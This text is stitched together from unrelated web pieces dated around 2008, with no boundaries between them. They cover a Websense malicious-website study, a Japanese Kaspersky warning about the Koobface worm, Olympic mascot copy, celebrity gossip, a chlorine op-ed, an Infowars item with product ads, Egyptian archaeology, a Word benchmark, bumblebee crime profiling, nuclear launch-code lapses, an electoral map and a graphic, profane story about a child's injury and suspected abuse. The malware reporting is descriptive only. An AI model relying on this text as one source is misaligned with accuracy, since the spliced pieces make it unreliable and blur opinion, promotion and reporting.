Sixty of the 100 most popular websites either hosted malicious content or linked to malicious websites at some point during the first six months of 2008 , according to a new study by web security firm Websense .
Many of these sites include search engine and social networking sites that are becoming a popular target for attackers thanks to their huge user bases allied to inadequate security controls .
Open redirects that allow hackers to bounce surfers off well - known sites onto dodgy domains are a big part of this problem , according to Carl Leonard , security research manager EMEA at Websense .
SQL injection attacks are also a major cause of grief , he added .
Websense recorded a market increase in drive - by download attacks that involve hackers loading malicious scripts , using tactics such as SQL injection attacks , onto otherwise reputable websites .
More than 75 per cent of the Web sites Websense classified as malicious during the 1H 2008 were legitimate websites that had become the victim of cybercrooks .
In the past , the majority of malware would crop up on warez and smut sites .
Overall 29 percent of malicious
Web attacks included data - stealing code , demonstrating that information pilfering rather than simple mischief is becoming a more and more significant driver of malware creation .
Brazilian and Chinese hackers get all the blame but the majority of spyware sends its information back to systems based in the US .
Around half ( 46 per cent ) of the malware attacks monitored by Websense in the first half of 2008 send data back over the web with connections made to systems in the US in 57.3 per cent of these cases .
By comparison , just 6 per cent of spyware phones home to China , only 4.3 per cent pings Russia and a similar 4 per cent hooks up with cybercrooks in Brazil .
Websense 's Leonard cautioned that its findings do n't necessarily mean malware - spreading cybercrooks are mostly based in the US .
" It could be the attacker is located in a different country .
cybercrime is international , " he said .
In other findings , Websense recorded a marked drop in malicious code created using exploitation kits over recent months .
It reckons VXers are using customised attacks more often in an attempt to bypass signature detection tools that are likely to block the product of rudimentary malware creation toolkits .
A summary of Websense 's latest research can be found here . ®
PR
ロシア のKaspersky Labは現地時間2008年7月31日，ソーシャル・ネットワーキング・サービス（SNS）「MySpace 」 「 Facebook」経由で感染するワームについて警告した。MySpaceユーザーを狙う「Net-Worm.Win32.Koobface.a」とFacebookユーザーを狙う「Net-Worm.Win32.Koobface.b」の2種類が存在するという。
このワームに感染したパソコンは，ゾンビとなりボットネットから制御可能な状態になる。MySpace／Facebook経由で別のパソコンへの感染を広げるだけでなく，ほかの悪質な動作も行う。
Net -Worm.Win32.Koobface.aは，MySpaceユーザーが自分のアカウントにアクセスすると感染し，友人ユーザーの書き込みなどにコメントを投稿する。Facebookユーザーに感染するNet-Worm.Win32.Koobface.bは，Facebook内の友人にメッセージを送る。
コメントやメッセージには 「 パリス・ヒルトン 」 や「隠しカメラの映像」などといった興味をそそる内容が書かれており，ビデオ共有サイト「YouTube」と思わせるリンクをクリックさせようとする。ユーザーがリンクをたどってビデオ再生を試みると，最新版「
Flash Player 」のダウンロードを求められ，指示に従うと実際にはワーム「codecsetup.exe」がダウンロードされる。最終的に，Facebookユーザーは対MySpaceワーム，MySpaceユーザーは対Facebookワームに感染してしまう。
Kaspersky Lab上級ウイルスアナリスト のAlexander Gostev氏は 「 SNSでは『友人』からのメッセージに対する信頼性が非常に高いため，こうしたメッセージに記載されているリンクをクリックする確率も極めて高くなる」と指摘する。
[ 発表資料 へ ]
Like the Five Olympic Rings from which they draw their color and inspiration , Fuwa will serve as the Official Mascots of Beijing 2008 Olympic Games , carrying a message of friendship and peace -- and good wishes from China -- to children all over the world .
Designed to express the playful qualities of five little children who form an intimate circle of friends , Fuwa also embody the natural characteristics of four of China 's most popular animals -- the Fish , the Panda , the Tibetan Antelope , the Swallow -- and the Olympic Flame .
Each of Fuwa has a rhyming two - syllable name -- a traditional way of expressing affection for children in China .
Beibei is the Fish , Jingjing is the Panda , Huanhuan is the Olympic Flame , Yingying is the Tibetan Antelope and Nini is the Swallow .
When you put their names together -- Bei Jing Huan Ying Ni -- they say " Welcome to Beijing , " offering a warm invitation that reflects the mission of Fuwa as young ambassadors for the Olympic Games .
Fuwa also embody both the landscape and the dreams and aspirations of people from every part of the vast country of China .
In their origins and their headpieces , you can see the five elements of nature -- the sea , forest , fire , earth and sky -- all stylistically rendered in ways that represent the deep traditional influences of Chinese folk art and ornamentation .
Spreading Traditional Chinese Good Wishes Wherever They Go
In the ancient culture of China , there is a grand tradition of spreading good wishes through signs and symbols .
Each of Fuwa symbolizes a different blessing -- and will honor this tradition by carrying their good wishes to the children of the world .
Prosperity , happiness , passion , health and good luck will be spread to every continent as Fuwa carry their invitation to Beijing 2008 to every part of the globe .
At the heart of their mission -- and through all of their work -- Fuwa will seek to unite the world in peace and friendship through the Olympic spirit .
Dedicated to helping Beijing 2008 spread its theme of One World , One Dream to every continent , Fuwa reflect the deep desire of the Chinese people to reach out to the world in friendship through the Games -- and to invite every man , woman and child to take part in the great celebration of human solidarity that China will host in the light of the flame in 2008 .
In China 's traditional culture and art , the fish and water designs are symbols of prosperity and harvest .
And so Beibei carries the blessing of prosperity .
A fish is also a symbol of surplus in Chinese culture , another measure of a good year and a good life .
The ornamental lines of the water - wave designs are taken from well - known Chinese paintings of the past .
Among Fuwa , Beibei is known to be gentle and pure .
Strong in water sports , she reflects the blue Olympic ring .
Jingjing makes children smile -- and that 's why he brings the blessing of happiness wherever he goes .
You can see his joy in the charming naivety of his dancing pose and the lovely wave of his black and white fur .
As a national treasure and a protected species , pandas are adored by people everywhere .
The lotus designs in Jingjing 's headdress , which are inspired by the porcelain paintings of the Song Dynasty ( A.D.960-1234 ) , symbolize the lush forest and the harmonious relationship between man and nature .
Jingjing was chosen to represent our desire to protect nature 's gifts -- and to preserve the beauty of nature for all generations .
Jingjing is charmingly naïve and optimistic .
He is an athlete noted for strength who represents the black Olympic ring .
In the intimate circle of Fuwa , Huanhuan is the big brother .
He is a child of fire , symbolizing the Olympic Flame and the passion of sport -- and passion is the blessing he bestows .
Huanhuan stands in the center of Fuwa as the core embodiment of the Olympic spirit .
And while he inspires all with the passion to run faster , jump higher and be stronger , he is also open and inviting .
Wherever the light of Huanhuan shines , the inviting warmth of Beijing 2008 -- and the wishful blessings of the Chinese people -- can be felt .
The fiery designs of his head ornament are drawn from the famed Dunhuang murals -- with just a touch of China 's traditional lucky designs .
Huanhuan is outgoing and enthusiastic .
He excels at all the ball games and represents the red Olympic ring .
Like all antelopes , Yingying is fast and agile and can swiftly cover great stretches of land as he races across the earth .
A symbol of the vastness of China 's landscape , the antelope carries the blessing of health , the strength of body that comes from harmony with nature .
Yingying 's flying pose captures the essence of a species unique to the Qinghai - Tibet Plateau , one of the first animals put under protection in China .
The selection of the Tibetan Antelope reflects Beijing 's commitment to a Green Olympics .
His head ornament incorporates several decorative styles from the Qinghai - Tibet and Sinkiang cultures and the ethnic design traditions of Western China .
Strong in track and field events , Yingying is a quick - witted and agile boy who represents the yellow Olympic ring .
Every spring and summer , the children of Beijing have flown beautiful kites on the currents of wind that blow through the capital .
Among the kite designs , the golden - winged swallow is traditionally one of the most popular .
Nini 's figure is drawn from this grand tradition of flying designs .
Her golden wings symbolize the infinite sky and spread good - luck as a blessing wherever she flies .
Swallow is also pronounced " yan " in Chinese , and Yanjing is what Beijing was called as an ancient capital city .
Among Fuwa , Nini is as innocent and joyful as a swallow .
She is strong in gymnastics and represents the green Olympic ring .
taken from official site for Olympic games
Woody Allen and Soon - Yi Previn , Unlikely Alliance Thrives ( Photos )
72 , and his wife of 11 years , 37 , were out and about in Hollywood last night .
The couple were photographed leaving Mr. Chow restaurant .
Their story started in a most sordid way back in 1992 when Soon - Yi Previn 's mother , actress Mia Farrow , discovered that her partner of 12 years , Allen , had been having a sexual relationship with her then 21 year old adopted daughter .
The revelation broke up the relationship and cause the severing of ties between mother and daughter .
Allen , famed film director , actor , writer , comedian , playwright and jazz musician continues to play the clarinet and performs with his band every Monday night at the Carlyle Hotel in Manhattan .
The group specializes in New Orleans jazz .
They played at the Montreal Jazz Festival in June .
His film Vicky Cristina Barcelona , starring Penelope Cruz premiered at the 2008 Cannes Film Festival .
Soon - Yi went on to earn a Masters Degree from Columbia University in Special Eduction in 1998 , a year after the couple married .
They have two adopted daughters .
Check out more photos below .
Woody has sued American Apparel for $ 10 million .
It goes to court on May 18 , 2009 and promises to get nasty - because the clothier plans to bring up Allen 's 1990 's sex scandal with Mia and Soon - Yi .
Photos : WENN
In 1971 an environmental and antiwar ethic was taking root in Canada , and I chose to participate .
As I completed a Ph.D. in ecology , I combined my science background with the strong media skills of my colleagues .
In keeping with our pacifist views , we started Greenpeace .
But I later learned that the environmental movement is not always guided by science .
As we celebrate Earth Day today , this is a good lesson to keep in mind .
At first , many of the causes we championed , such as opposition to nuclear testing and protection of whales , stemmed from our scientific knowledge of nuclear physics and marine biology .
But after six years as one of five directors of Greenpeace International , I observed that none of my fellow directors had any formal science education .
They were either political activists or environmental entrepreneurs .
Ultimately , a trend toward abandoning scientific objectivity in favor of political agendas forced me to leave Greenpeace in 1986 .
The breaking point was a Greenpeace decision to support a world - wide ban on chlorine .
Science shows that adding chlorine to drinking water was the biggest advance in the history of public health , virtually eradicating water - borne diseases such as cholera .
And the majority of our pharmaceuticals are based on chlorine chemistry .
Simply put , chlorine is essential for our health .
My former colleagues ignored science and supported the ban , forcing my departure .
Despite science concluding no known health risks – and ample benefits – from chlorine in drinking water , Greenpeace and other environmental groups have opposed its use for more than 20 years .
Commentary on Israel , the Middle East , and the Jewish World
Infowars
August 27 , 2008
In the video here , Recreate 68 ’s Mark Cohen , dressed like Mickey Mouse in Walt Disney ’s The Sorcerer ’s Apprentice , attempts to levitate the Denver Mint .
Cohen is flanked by 1960s throwbacks spouting socialist nonsense .
Does Mr. Cohen sincerely believe he can actually levitate the Mint with his wizard outfit ?
No , of course not .
But what Mr. Cohen does is make legitimate protest look patently ridiculous .
Recreate 68 so far has not managed to incite a police riot in Denver , but he has effectively imparted the message that antiwar and antiglobalization demonstators are Looney Tunes , or maybe that should be Disney Tunes .
9/11 Chronicles Part One : Truth Rising
Get the DVD and make copies or watch the high quality streaming and download version online at Prison Planet.tv .
Click here to read more about the film and view sample trailers .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
A University of Chicago expedition at Tell Edfu in southern Egypt has unearthed a large administration building and silos that provide fresh clues about the emergence of urban life .
The discovery provides new information about a little understood aspect of ancient Egypt — the development of cities in a culture that is largely famous for its monumental architecture .
The archaeological work at Tell Edfu was initiated with the permission of the Supreme Council of Antiquities , headed by Zahi Hawass , under the direction of Nadine Moeller , Assistant Professor at the Oriental Institute , University of Chicago .
Work late last year revealed details of seven silos , the largest grain bins found in ancient Egypt as well as an older columned hall that was an administration center .
Long fascinated with temples and monuments such as pyramids , scholars have traditionally spent little time exploring the residential communities of ancient Egypt .
Due to intense farming and heavy settlement over the years , much of the record of urban civilization has been lost .
So little archaeological evidence remains that some scholars believe Egypt did not have a highly developed urban culture , giving Mesopotamia the distinction of teaching people how to live in cities .
“ The traditional view of ancient Egypt has been biased by the fact that most excavation work so far has focused on temples and tombs .
The mounds which comprise the remains of Egyptian cities were either ignored , buried under modern towns , or else destroyed by modern agricultural activities .
Edfu is one of the very few remaining city mounds that are accessible for scientific study , ” said Gil Stein , Director of the Oriental Institute .
“ The work at Edfu is important and innovative in that it finally allows us to examine ancient Egypt as an urban society , whose cities and towns housed bureaucrats , craft specialists , priests , and farmers .
Nadine Moeller ’s discovery of silos and local administrative buildings shows us how these cities actually functioned as places where the agricultural wealth of the Nile valley was mobilized for the state .
Grain as currency provided the sinews of power for the pharoahs , ” he added .
“ Ancient Egyptian administration is mainly known from texts , but the full understanding of the institutions involved and their role within towns and cities has been so far difficult to grasp because of the lack of archaeological evidence with which textual data needs to be combined , ” Moeller said .
At Tell Edfu , archaeologists have uncovered what amounts to a downtown area .
The community , halfway between the modern cities of Aswan and Luxor , was a provincial capital an important regional center .
Tell Edfu is also rare , in that almost 3,000 years of Egyptian history are preserved in the stratigraphy of a single mound .
The administrative building and silos were at the heart of the ancient community .
Because grain was a form of currency , the silos functioned as a bank and a food source .
The silos ’ size indicates the community was apparently a prosperous urban center .
The grain bins are in a large silo courtyard of the 17th Dynasty ( 1630 - 1520 B.C. ) and consist of at least seven round , mud - brick silos .
With a diameter between 5.5 and 6.5 meters , they are the largest examples discovered within a town center .
The team unearthed an earlier building phase for the hall that predated the silos .
In that phase , a mud - brick building with 16 wooden columns stood at the site .
The pottery and seal impressions found in the hall date it to the early 13th Dynasty ( 1773-1650 B.C. ) .
The building layout indicates that it may have been part of the governor ’s palace , which was typical of provincial towns .
There is no exact parallel for such a columned hall being part of the administrative buildings .
Scribes did accounting , opened and sealed containers , and received letters in the column hall .
The ostraca , or inscribed pottery shards , list commodities written on them .
The administrative center was used when Egypt ’s political unity was lost and a small kingdom developed at Thebes ( modern Luxor ) and controlled most of Upper Egypt .
“ During this period , we can see an increase in connections between the provincial elite , such as the family of the governor , to the royal family at Thebes , who were keen on strengthening bonds through marriage , or by awarding important offices to these people , ” Moeller said .
“ It is exactly at this period when Edfu seems to have been very prosperous , which can now be confirmed further by archaeological discoveries such as this silo - court , a symbol for the wealth of the town , ” she said .
The responses to benchmarking multiple versions of OpenOffice.org varied .
Common responses were oversimplification of the results and some unrealistic expectations .
To put that data into perspective , here is a benchmark for Microsoft Word 95 through 2007 .
That 's over a decade years of releases , each of which has definitely become fatter .
Before you read the benchmark results below , do you think over the years Word has become slower or faster ?
Benchmark test environment
The modest test machine is about three years old .
Operating system : Windows XP SP3 ( clean install )
CPU : AMD Athlon XP 3000 +
RAM : 768 MB , DDR 333 ( PC 2700 )
HDD : Maxtor 6Y080L0 , IDE , 7200 RPM , 80 GB
Video : Via VT8378 S3 Unichrome IGP at 1024x768
Though this is the same hardware as the OpenOffice.org benchmark , the results are not an apples - to - apples comparison between Microsoft Word and OpenOffice.org
Writer because of differences in the test documents , operating system , and test procedure .
Check back later for a direct comparison .
The Microsoft dilemma and the problem of quick starters
Benchmarking Microsoft Office has dilemmas .
Microsoft Office 95 through Office XP install quick starters under various names in the Startup folder .
These include Fast Start and Microsoft Office Startup Assistant ( OSA ) .
Their purpose is to improve startup performance by preloading Office into memory because hard drives are slow .
Office 2003 and 2007 no longer load the OSA by default .
The reason is likely because Windows XP introduced a prefetcher at the operating system level .
Quick starters do n't really avoid any work .
Quick starters simply hide the appearance of work by performing it before it is requested .
To start the application , the operating system has to read the same amount of data from the hard drive ( consuming disk I /O resources ) and process it ( consuming CPU resources ) .
Being proactive is commendable , but there are drawbacks .
First , quick starters use precious resources regardless of demand .
If you do n’t use the preloaded application , the resources that could improve other parts of the system are wasted .
Speaking of precious resources , you probably experienced the second problem many times : the sluggish feeling of logging into a Windows XP session with many quick starters and system tray icons firing off simultaneously .
Whether you notice them or not ( because some load silently in the background ) , you may be waiting for Adobe Acrobat Reader Speed Launch , Quicktime , Winamp Agent , iTunes Helper , and others quick starters and services to load .
It can easily be 30 seconds before the session is usable .
A third problem with quick starters is they may be ineffective .
Say you start Windows , then browse the web , and then open some PDFs , and then listen to some music .
It 's likely that by loading programs and accessing stored data , the operating system will eventually swap the preloaded application from RAM to the page file on the hard disk .
Then , when you start the preloaded application , the operating system retrieves the file from the hard disk .
In conclusion , quick starters are imperfect .
Once we all get low - latency , low - seek - time solid - state drives so we can forget about quick starters , but these SSDs are only starting to enter the mainstream .
The goals of this benchmark include being realistic , being fair , being consistent , and measuring the amount of work as it relates to the user experience .
If the quick starters were enabled , that would give Word 95 through XP an advantage over 2003 and 2007 .
Given the above problems and goals , I disabled Fast Start and OSA to better distinguish cold starts versus warm starts .
I left Windows Prefetcher on its default settings .
In the future when I benchmark OpenOffice.org on Windows , I will generally benchmark OpenOffice.org with its Quickstarter disabled too .
Benchmark test procedure
Very similar to the OpenOffice.org benchmark , this Microsoft Word benchmark uses automation to precisely measure the duration of a series of common operations : starting the application , opening a document , scrolling through from top to bottom , saving the document , and finally closing both the document and application .
Automation is much more precise than a human with a stopwatch , and with the small durations in these tests , automation is necessary .
Each of the five tests are repeated for 10 iterations .
Before each set of 10 iterations , the system reboots .
The purpose of rebooting is to measure the difference in cold start performance where information is not yet cached into fast memory .
A reboot marks a pass , and there are 15 passes .
That means for each version of Word , there are 150 iterations .
Multiplying by 5 tests and by 6 versions of Microsoft Word yields 4500 total measurements collected for this article .
Benchmark results
A critical metric to the feeling of overall speed is starting an application on a cold start .
The average cold start duration worsened 90 % from Word 2003 to Word 2007 .
That 's almost an order of magnitude .
( In all the boxplots below , smaller is better . )
Notice the three outliers depicted as dots in the Word 2007 column .
That is the Windows XP Prefetch progressively optimizing startup performance .
The second cold start was slightly longer , but the third was about half .
The fourth start was about a one - fourth of the first duration .
Warm starts from Word 2003 to Word 2007 deteriorated 247 % from 0.13 seconds to 0.45 seconds .
Also notice the difference for Word 2007 because cold and warm starts is 1.57 seconds - 0.45 seconds = 1.11 seconds .
The difference of 1.11 seconds implies that work ( 71 % ) is done by the hard drive .
To be fair , an application start under two seconds is quick .
Document tests were done with a special set of documents that use a wide variety of word processor features but are still backwards compatible to Word 95 .
Each version of Word used its own format for a total of three test documents : Word 95 , Word 97/2000 /XP/2003 , and Word 2007 .
The Word 97 format introduced multibyte encoding to support a wider variety of human languages : that made documents bigger and increased disk I /O ( which is slow ) .
That contributed to performance losses of 74 % cold and 18 % warm from Word 95 to 97 .
Word 2007 introduced the compressed . docx format which was smaller on the disk ( so less disk I/O ) , but uncompressing and parsing XML requires much more CPU time .
That contributed to performance degradation of 305 % cold and 160 % warm from Word 2003 to 2007 .
Scrolling may measure screen painting , loading dynamic objects , and OLE automation .
Again , Word 2007 is slower .
The times for exporting the document are all relatively fast , but performance still declined 114 % cold and 58 % warm from Word 2003 to 2007 .
The times to closing the document and application are all reasonably quick , but guess what ?
Going from Word 2003 to Word 2007 , it took 82 % longer on a cold start and 75 % longer on a warm start .
In the beginning , what was your guess : did you guess Word 2007 will be faster or slower ?
Well , here are all the tests rolled up together .
Word 2003 burned 7.05 seconds to run the gamut after a cold start and 6.17 seconds after a warm start .
Word 2007 consumed 16.12 and 12.13 seconds ( respectively ) .
Benchmark conclusion
Despite all the tweaks , tricks , hacks , and clever engineering , Microsoft 's latest version of Word is a step back in performance .
That 's generally true of every new major release of any software .
That 's Wirth 's Law .
When Windows 95 came out , people joking exaggeratedly that " 95 " was the number of floppies Windows 95 shipped on .
Though Windows 95 actually shipped on many fewer floppies , the point is that Windows 95 was a huge , slower beast compared to its predecessors .
( Does anyone remember Windows 3.1 , OS / 2 Warp , and DESQview ? )
There were similar complaints for XP , and Vista 's performance was the subject of the infamous " Vista Capable " class action lawsuit against Microsoft .
All that to say , whether you are upgrading to the latest Microsoft Office or OpenOffice.org on the same hardware year after year , someday something somewhere will have to give : you 'll need to stop upgrading your software or start upgrading your hardware .
Related articles
This article is the fifth in an ongoing series on performance .
Wednesday , 30 Jul , 2008 Science
Scientists consider that by analyzing the techniques used by bumblebees when they search for food , could be helpful in tracking down serial killers .
According to a team of scientists from the University of London , killers avoid any victims near their homes just like bumblebees forage away from the place their live .
Such " geographic profiling " is working quite well in bees , which is why scientists believe that future experiments on bees could significantly improve crime - solving .
The work of the team is presented in the Royal Society journal Interface .
" We 're really hopeful that we can improve the model for criminology , " said Dr Nigel Raine , from Queen Mary , University of London ( QMUL ) .
Dr Raine is currently working together with Steve Le Comber and a former detective in the United States , Kim Rossmo .
They tag bumblebees with small colored numbers and then track their way from the nests to the flower patches .
The team 's analysis characterizes the way bees produce a " buffer zone " around their hive .
This is the area where they will not forage .
The buffer zone is created with the goal of lowering the risk of nest identification by predators and parasites .
Such behavior resembles the geographic profile of serial killers stalking their victims .
" Most murders happen close to the killer 's home , but not in the area directly surrounding a criminal 's house , where crimes are less likely to be committed because of the fear of getting caught by someone they know , " explained Dr Raine .
The models used by criminologists will focus on details linked with crime scenes , places where robberies occurred , abandoned cars and even dead bodies , in order to improve the search for a suspect .
" Bees have much simpler brains and so understanding how bees are recruited to flowers is much easier than understanding the complex thoughts of a serial murderer , " mentioned Dr Raine .
In a broader research the team looks forward to understand the way one of the most recognizable animals in nature carry on with its daily business .
" Bees are hugely important to ecosystems and also important to humans .
Bees ' pollination ' services ' account for about one in three mouthfuls of food that we eat as humans .
They pollinate a huge diversity of our fruit and vegetable crops .
If we do n't know how bees forage then we do n't really understand pollination , and that is quite detrimental to how we feed ourselves ; which is becoming an increasing problem with bigger populations , " said Dr Raine .
Every movement of the bees is monitored .
The team tracks the movements with the help of small Radio Frequency Identification ( RFID ) tags , which are commonly used to monitor stock in warehouses or supermarkets .
Researchers glue the tags to the back of the bees and then analyze the way they move in and out of their hive .
Source : BBC News
Powered by www.infoniac.com
WASHINGTON ( CNN ) --
Three Air Force officers fell asleep while in control of an electronic component that contained old launch codes for nuclear intercontinental ballistic missiles , a violation of procedure , Air Force officials said Thursday .
The Air Force said the launch codes had been deactivated before the incident , but it was still a violation of protocol , prompting an investigation .
It is the fourth incident in the past year involving problems with secure handling of components of America 's nuclear weapons .
The incident occurred July 12 , during the changing out of components used to facilitate secure communications between an underground missile - control facility and missile silos near Minot Air Force Base in North Dakota , according to Col.
Dewey Ford , a spokesman for the Air Force Space Command in Colorado .
One of the parts , a code component , is for storage and processing .
It is considered classified by the Air Force .
A code component was removed from the equipment at the remote missile - control facility and replaced with a new code component .
That made the old component inoperable , but an Air Force source said old launch codes were still contained in the part .
Under standard procedure , the four - officer crew of the facility is supposed to keep the component secure until it is returned to the base .
Ford said the crew took the component to a building above the facility and locked the component in a lockbox .
Then , three of the four crew members fell asleep .
This violated Air Force procedure , which calls for at least two of the crew members to remain awake while in control of the component .
At the time they were asleep , the crew and the component were in a locked building that is guarded by at least one armed airman at all times .
The airmen were asleep for two to three hours , Ford said .
The component was later returned to the Minot base , and the investigations of procedural violations were started by Missile Command , Space Command , the 20th Air Force and the National Security Agency .
The investigation revealed the codes were not compromised , according to the Air Force .
The codes had remained secured , and the crew was inside an area protected by Air Force security at all times , the investigation concluded .
The incident , which was first made public by the Project on Government Oversight , was the fourth misstep involving the handling of America 's nuclear weapons in the past year .
Last summer , a B - 52 flew from Minot AFB to Barksdale AFB in Louisiana carrying six nuclear warheads that were not supposed to leave Minot .
The crew of the bomber did not know that it was carrying nuclear missiles .
In March , the Department of Defense discovered that nuclear triggers had been mistakenly sent to Taiwan and left there for 18 months before being returned to the United States .
In May , Minot 's 5th Bomb Wing failed a crucial security inspection .
The wing was the same unit involved in the B - 52 incident .
All About U.S. Air Force • Nuclear Weapons
Barbados is one of the world 's top holiday resorts A group of West Africans have been stranded on the Caribbean island of Barbados .
The group arrived in February on the first direct flight from Ghana to the Caribbean for a two - week trip .
But the holidaymakers found themselves stranded when their scheduled Ghana International flight failed to arrive .
About 70 of the original group of 149 are thought to have been detained at a military base amid fears that some have not reported to authorities .
We do n't know what is going on
Osa Agbonicota
One of the group , Osa Agbonicota from Nigeria , told the BBC she went to the airport on 15 February but the plane did not arrive .
" They promised to come back for us but up to now they have not come , " she said .
She said she spent two and a half months at the airport before being moved to the Paragon military base , where conditions were very difficult .
" Insects were crawling around the rooms and the compound and we had to take all our bedsheets off , " she said .
She said the government of Barbados told them they would be sent back to West Africa but had taken them to the military base to ensure they were all in the same place .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Shown immediately below is the electoral map showing the results of the 2008 presidential election in which Brack Obama defeated John McCain .
Below that is the Electoral Map from the Intrade prediction market as of 12:01 AM election day .
Nebraska will be splitting its electoral votes , for the first time in state history .
Four votes will be given to John McCain and one to Barack Obama .
Democrat : 317 [ + 28 ]
Republican : 216 [ - 11 ]
Dead Heat : 5 [ - 17 ]
Total : 538 ( 270 to win )
use arrows to change date
6-22-08
Ashley is five years old .
Last Monday at the after - school program where I work , Ashley stuck a straightened paper clip into a wall socket .
You hear about kids doing this all the time .
A little shock and they never do it again .
Ashley will assuredly never do this again .
I do n't know what weird combination of factors came together at just the wrong moment .
None of us know exactly what happened .
I did n't see it , but about 40 subsequently very freaked - out kids did .
They told me various versions of the story , each more grisly than the last .
As it turns out , none of them were exaggerating .
The adults who were supervising that room at the time ( it 's a big room , and they can't be everywhere at once ) told me that three jets of fire burst out of the wall , knocking Ashley back about ten feet .
The carpet was burned down to bare concrete in three spots , including a charred coil shaped like the unbent end of the paper clip .
Before she dropped it , it burned an identical coil onto the side of Ashley 's index finger .
Her hand was blackened and bloody .
Her fingers were described to me ( when I tell people this story , I can not bring myself to say this out loud . ) as being split open like a hotdog that 's been in the microwave for too long .
They said you could see things inside , like tendons , and bone
The woman who wrapped up Ashley 's hand , and put ice on it , and sat with her until we could get the mom on the phone to verbally ok our driving her child to the emergency room ( the legal hoops we have to jump through in situations like this are unbelievable ) - that woman , my co-worker , fainted while telling me this story .
She 's good in a crisis but blood freaks her out .
When she came to , she cried .
Ashley 's mom is an alcoholic Divorced .
Full custody . ( " " )
She works from home and lives three minutes from the school , but does not pick Ashley up when school lets out at 2 - rather , she waits until 6:30 , when the after - school program is ready to lock its doors .
Ashley is always the last child to leave .
Mom stomps in the door and growls , " Where 's the little bitch ? "
They go home and Ashley is put to bed at 7 pm .
She might get dinner and she might not .
Some of this information comes from Ashley , and kids exaggerate , but her father has confirmed that it is true .
I have only spoken with him once .
I told him he had a sweet kid ( I did not mention how sad and scared she looks all the time .
he knows . ) and his eyes filled with tears and he touched me on the shoulder and he told me how hard he is fighting to get custody .
He told me how much he misses her .
Every day .
She did n't come back to school for days and days , and I was thinking , dude , even if they chop off your arm , you'd be back to school in a week , right ?
Unless .
Unless your cunt of a mother gets pissed at you for being a kid and doing kid things , and she beats the shit out of you , or knocks you down the stairs , or breaks your arm , or punches you in the face and is ashamed to let the world see the black eye ?
A lot of things could happen .
Every day : no Ashley .
None of her friends have seen her .
We call their house and the line 's been disconnected .
What do you do ?
I mean , really , what are you supposed to do ?
Today , the kids are shuttling over from the school building to our building , and they 're lining up to get signed in , and I 'm checking their names off the list .
And I look up and there she is .
And she 's grabbing Emma 's butt with her good hand and Emma is sick of it and she is hollering QUIT IT , and Ashley is shrieking and I have to threaten to separate them , and I 've never been happier .
Later , she lets me look at her hand .
I 'm no doctor but my verdict is : miracle .
She says it hurts , and I think , Good , that means those parts are still hooked up right .
I had been thinking amputation all week , but , no .
It still looks pretty bad - vicious purple slashes on her index , middle , and thumb .
But there is no black flesh , or disfigurement , or stumps .
She will have scars - that coil , burned into the side of her finger , will always be there , I imagine .
I ask her if she got in trouble for what she did .
She says her mom was n't mad , only disappointed .
Which probably amounts to a massive guilt trip laid on the poor kid .
" Verbal abuse " is such a poor phrase for words that can ruin a kid 's chances , from the start , of seeing herself as anything other than useless and in the way .
Then again , Ashley says her mom told her about when she was little , and she got a bad shock from an exposed wire .
And she says that when they got home from the hospital , they watched a video and had ice cream .
I know it is too much to expect that one bad accident could completely reverse this hateful woman 's attitude toward her daughter , a lifetime ( five years . ) of disregard and cruelty .
But then again people change all the time , and something has to start it .
Right ?
Can I hope for that ?
This little , little kid does n't want to tell me about how much her fingers hurt , she wants to tell me about how great it was to snuggle with her mom on the couch that night , watching 101 Dalmatians .
She 's shining up at me .
She 's so happy .
Can I keep hoping for more of this ?
How can I not ? : Today I happened to be in the lobby when Ashley 's mother came to pick her up .
I 've never talked to her very much ; she scares me .
I made my face as innocent as all get out and I said , Hey , we were all so glad when we heard Ashley was all right .
I 've never seen tears well up in anybody 's eyes so fast .
She said she was on the interstate when her cellphone rang , and they told her what was going on , and she had to pull over to throw up .
" I mean , I just - " She closed her eyes and rubbed her forehead with her fist .
" I was so scared .
You know ?
" Yeah , I think .
I know .
And I think , you keep that taste in your mouth .
You think about it .
This might end up ok . : Ashley 's dad won full custody .
She told me with a gigantic grin .
I wo n't be seeing her any more - dad lives far away - which is fine .
Ashley says her mom " has to go back to the hospital . "
I do n't know if that means rehab or what , but it has to be a step in the right direction .
Well , just about everybody in the U.S. hierarchy , from commanders on the ground to the Joint Chiefs to the CIA to Barack Obama to John McCain to members of both parties in Congress , seems to agree now .
It ’s time for the United States to focus on Afghanistan and apply the valuable lessons we learned in Iraq about how not to do nation - building to Afghanistan .
This time we ’ll get it right , and root out the Taliban and al - Qaeda to boot .
Has anybody even heard about the history of that Texas - sized geographical region , its key borders largely determined by the British Empire , which took no account of either the topographical or ethnic characteristics of the region it so carelessly divided ?
For at least several hundred years , Afghanistan has been the place where " healthy " empires get defeated and where aging empires go to die  sort of an elephant ’s graveyard of decaying empires .
There seems to be something about this rugged , mountainous region that has never been a nation - state and probably never will be that lures imperial overlords to test their mettle  and most often to meet their doom .
So now the American empire will make a last stand in Afghanistan and try to lure a tottering NATO , which has no real reason to exist anymore either , into the adventure ?
Good luck .
You would think that the relatively recent experience of the Soviets , who tried to occupy and dominate Afghanistan beginning in 1979 , would give second thoughts to anyone thinking of foreign - assisted nation - building in Afghanistan .
Afghanistan became the " Soviets ’ Vietnam , " costing many lives and a great deal of confidence in the Soviet " homeland . "
Certainly the Soviets ’ failure to impose their will in Afghanistan had a great deal to do with  though other factors were in play  the collapse of the Soviet empire .
An Outsider ’s Nightmare
Why is Afghanistan so difficult for outsiders to dominate or even assist ?
Although it has some fertile valleys , high pastures in the mountains suitable for grazing sheep or goats , as well as deserts in the west , Afghanistan is largely mountainous .
As the Library of Congress ’ country study puts it , the country ’s history and political development " have largely been determined by its geographic location at the crossroads of Central , West , and South Asia . "
" Over the centuries , waves of migrating peoples passing through the region  described as a ’ roundabout of the ancient world , ’ by historian Arnold Toynbee  leaving behind a mosaic of ethnic and linguistic groups .
In modern times , as well as in antiquity , vast armies of the world passed through Afghanistan [ Alexander the Great ’s was n’t the first ] , temporarily establishing local control and often dominating Iran and northern India .
" Although it was the scene of great empires and flourishing trade for over two millennia , Afghanistan did not become a truly independent nation until the twentieth century .
The area ’s heterogeneous groups were not bound into a single political entity until the reign of Ahmad Shah Durrani , who in 1747 founded the monarchy that ruled the country until 1973 . "
A strong case can be made that with its many mountain valleys where people have lived as semi-isolated groups for long periods , the country is not suited to be a nation - state in the post - 16th - century sense at all , and might never become one except through brute force .
